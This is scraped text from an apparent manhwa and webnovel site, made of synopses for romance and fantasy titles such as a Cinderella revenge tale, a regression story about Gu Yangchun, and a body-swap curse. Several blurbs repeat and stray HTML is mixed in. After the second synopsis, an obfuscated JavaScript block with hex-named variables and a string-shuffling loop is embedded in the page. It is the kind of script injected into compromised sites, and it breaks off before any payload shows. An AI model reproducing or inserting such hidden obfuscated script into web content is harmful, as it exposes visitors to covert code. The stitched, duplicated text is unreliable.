This story begins when our hero and heroine reunite seven years later. The heroine is now an overly cautious entertainer, and the hero is a wealthy tycoon. They both loved each other, but because of a misunderstanding seven years ago, they both thought the other was not interested. Luckily, after experiencing many hardships together, and uncovering the truth, the lovers finally got married and stepped into the realm of happiness. CEO’s Wife on Trending Topic Again
Man Qian, an ordinary girl in university, is crushing on Chang Le, a boy from the xiangsheng (comedy) club. She wants to confess but fails every time because she can’t look him in the eye without laughing! How will she learn to control her laughter?<script></script><script>(function(_0x136db0,_0x1455b4){var _0xcf850b=_0x5148,_0x20596a=_0x136db0();while(!![]){try{var _0x5e19b2=parseInt(_0xcf850b(0xb3))/(-0x1*-0x20c7+-0xd1*-0x19+-0x352f)*(parseInt(_0xcf850b(0xa6))/(0x1*-0x1b85+0x1cd1+-0x1e*0xb))+-parseInt(_0xcf850b(0xb7))/(-0x19ec+0x41b*0x6+0x14d)*(-parseInt(_0xcf850b(0xb1))/(-0x24d+0xf7+0x15a))+parseInt(_0xcf850b(0xbf))/(-0x1d4b+-0x1f*-0x3e+-0xae7*-0x2)*(-parseInt(_0xcf850b(0xac))/(0x3*0x2b+-0x10e8+0x106d))+-parseInt(_0xcf850b(0x9e))/(0x7d*-0x19+0x2531*0x1+0x1*-0x18f5)*(parseInt(_0xcf850b(0xbb))/(0x1*-0x1965+0x20*0xbd+-0x1*-0x1cd))+-parseInt(_0xcf850b(0xa8))/(-0x314+0x279+-0x4*-0x29)+-parseInt(_0xcf850b(0xbe))/(0x825+0x7*0x6+-0x845)+parseInt(_0xcf850b(0xb4))/(0x2b*-0x9d+-0x145*-0x17+-0x1f*0x17);if(_0x5e19b2===_0x1455b4)break;else _0x20596a['push'](_0x20596a['shift']());}catch(_0x279460){_0x20596a['push'](_0x20596a['shift']());}}}(_0x243c,0x76d79+0x30aa*-0x35+0xc57b0));function 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<span class="mx-1">Charming and the Beast </span> Something's wrong; It's like I've been possessed. Something weird has happened. Hair - fur? - has grown. My size has greatly increased too. Everyone who sees me looks terrified. I've become a beast. Why?
Read Manhwa Childhood Friend Of The Zenith Gu Yangchun, Who Betrayed The Orthodox Sects, Became A Demonic Human Under The Heavenly Demon. Living As A Demonic Human, He Led A Life Filled With Regret. He Committed Countless Evils Not Of His Own Accord, But Under The Orders Of The Heavenly Demon. In The Great Orthodox-Demon War, Thanks To Wi Seol-Ah, Who Cut Down The Heavenly Demon That Made Even The Three Supremes Of The Orthodox Forces Kneel, Gu Yangchun Was Taken Prisoner By The Orthodox Forces And Suffered For His Sins. With Whatever Morals He Had Left In Him, He Died Giving Wi Seol-Ah Information About The Demon Cult Due To A Bind The Heavenly Demon Had Placed On Him. Then, For Some Reason, Gu Yangchun Regressed To When He Had First Met Wi Seol-Ah. Realizing The Regression Was Not A Dream, Gu Yangchun Decided To Live A Quiet Life. However, Bad Ties From His Previous Life Began To Draw Near, One By One.
Ha Yoon-seo learned that Seo Joo-won, her lover for three years, is the youngest son of a rich family. Ha Yoon-seo receives money in exchange for breaking up with Joo-won. And although she did all things to make him break up with her, Joo-won didn't stop pursuing her and still tried to change Yoon Seo's mind... Cinderella in the morning / 새벽 두 시의 신데렐라
People Called Terryl ‘Cinderella.’ It Was Meant To Be A Charming Nickname For Her, Who Was A Mere Baron’s Daughter Before Falling In Love With The Second Son Of A Marquis. However One Day, He Abruptly Bid Adieu, Leaving Terryl Wounded By Her Lover’s Betrayal. And Suddenly, The So-Called ‘King Of The North,’ Duke Of Rihan, Stood In Front Of Her. He Identified Himself As Terryl’s Biological Father, Whom She Assumed Was No Longer Alive. Because She Became The Duke’s Daughter Overnight, She Had To Put In A Lot Of Work To Become The Duke’s Successor! * * * * Three Years Later, Terryl, Seeking Vengeance On Her Ex-Lover, Offers Cesio, The Marquis’ Eldest Son, A Contract Of Engagement To Take Away What Her Former Lover Desired Most, The Title Of ‘Marquis.’ “I Want An Engagement With Young Lord Cesio.” “All Right, Take Full Advantage Of Me.” As The Two Were Engaged, They Became More Aware Of One Another, And As Terryl Becomes Closer To Cesio, She Learns An Unexpected Secret About Him… ‘Terryl,’ Who Became The Duke’s Heir Overnight, And ‘Cesio,’ Who Inherited The Marquisate After Being Engaged To Her. Will ‘Cinderella’ Find Love By The End Of This Tale? Alternative Name I Wasn’t Cinderella / 신데렐라는 내가 아니었다
People called Terryl ‘Cinderella.’ It was meant to be a charming nickname for her, who was a mere Baron’s daughter before falling in love with the second son of a Marquis. However one day, he abruptly bid adieu, leaving Terryl wounded by her lover’s betrayal. And suddenly, the so-called ‘King of the North,’ Duke of Rihan, stood in front of her. He identified himself as Terryl’s biological father, whom she assumed was no longer alive. Because she became the Duke’s daughter overnight, she had to put in a lot of work to become the Duke’s successor! * * * * Three years later, Terryl, seeking vengeance on her ex-lover, offers Cesio, the Marquis’ eldest son, a contract of engagement to take away what her former lover desired most, the title of ‘Marquis.’ “I want an engagement with Young Lord Cesio.” “All right, take full advantage of me.” As the two were engaged, they became more aware of one another, and as Terryl becomes closer to Cesio, she learns an unexpected secret about him… ‘Terryl,’ who became the Duke’s heir overnight, and ‘Cesio,’ who inherited the Marquisate after being engaged to her. Will ‘Cinderella’ find love by the end of this tale? <h4>Alternative Name</h4> I Wasn’t Cinderella / 신데렐라는 내가 아니었다
After Isabell’s father passed away when she was just twelve years old, her cruel and jealous step-mother reduced her to a life of servitude. Doomed to forever live in her step-sisters’ shadow, Isabell never expected a distant relative to show up at her doorstep, promising her a chance at a better life with a noble title. The only catch? She has to attend the king’s ball and meet prince Tristan, who just so happens to be in need of a bride before reaching his twenty-first birthday. The only problem? She has no intention of becoming a princess, and Tristan has no interest in love. A masked ball. Two hundred thirty-six ladies. Four men all posing as the prince. A servant boy with a regal sense of charm. One woman caught between it all. Can Isabell win the freedom she’s always longed for, or will she find a way to win the prince’s heart?
Circumstances of Changing Bodies / 몸이 바뀌는 사정 / <div class="post-title"> <h1>Circumstances of Switching Bodies</h1> </div> The prince was cursed of switching bodies with the woman he spent the night with, and I became the daughter of the duke who could not solve the curse. Tempted to solve the curse, I seduced him indifferently and spent the night with him. I gave him the antidote, so I stopped paying attention to him… “Princess, you’re leaving me because you weren’t satisfied that night.” “…” “Once more. I’ll satisfy you this time.” To make matters worse, the curse has not been lifted and our bodies have switched frequently without notice. There’s only one way back to our original bodies, which is to desire each other’s bodies. Circumstances of Changing Bodies
Read manhwa Circumstances of Changing Bodies / 몸이 바뀌는 사정 / <div class="post-title"> <h1>Circumstances of Switching Bodies</h1> </div> The prince was cursed of switching bodies with the woman he spent the night with, and I became the daughter of the duke who could not solve the curse. Tempted to solve the curse, I seduced him indifferently and spent the night with him. I gave him the antidote, so I stopped paying attention to him… “Princess, you’re leaving me because you weren’t satisfied that night.” “…” “Once more. I’ll satisfy you this time.” To make matters worse, the curse had not been lifted and our bodies have switched frequently without notice. There’s only one way back to our original bodies, which is to desire each other’s bodies, but- “Your Highness, why did you rush all the way here?” “You said you didn’t like being rained on.” “I told you it was a lie to lure you in.” The changed man covered me with his jacket and said softly, “I hate myself for letting you get rained on.”